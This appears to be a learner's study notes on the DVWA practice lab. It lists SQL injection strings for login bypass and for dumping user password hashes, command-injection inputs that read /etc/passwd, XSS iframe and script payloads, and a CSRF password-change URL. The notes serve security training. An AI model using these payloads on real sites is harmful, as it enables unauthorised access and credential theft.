sql injection  ---on dvwa these seem backwards...

	scope out the db with simple injections 
	'    --- does it throw an error


	---low
	' or 1=1 -- ;-----don't forget the space in mySQL
	---medium
	1 or 1=1 -- ;----- space it did take me a while to figure this out because i didn't put myself in the shoes of a bad developer. it didn't occur to me 


	admin' and 1=1 -- log in bypass

	data exfiltration
		--low
		1' UNION ALL SELECT user, password FROM users -- returns the hashed passwords
		--medium
		1 UNION ALL SELECT user, password FROM users -- 

command execution

	scope it out and see what it does
	out put looks very familiar (just like the ping utility) it must be using it via php system() and passing what i type in the box to ping.
	Could you string multiple commands together? yes
	most systems allow && or ; 



	---low
	127.0.0.1&& cat /etc/passwd

	---medium
	127.0.0.1|cat /etc/passwd
	192.168.1.1| echo \<script\>alert\(\"test\"\)\<\/script\> 	--example of xss use this to append to the end of a document.

XSS
	<iframe src='http://google.com' width='640' height='480'></iframe>
	or
	inject this <iframe src='http://google.com' width='640' height='480'></iframe> into a database that is queried for content to display




CSRF
http://t3100/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&user=1337&Change=Change#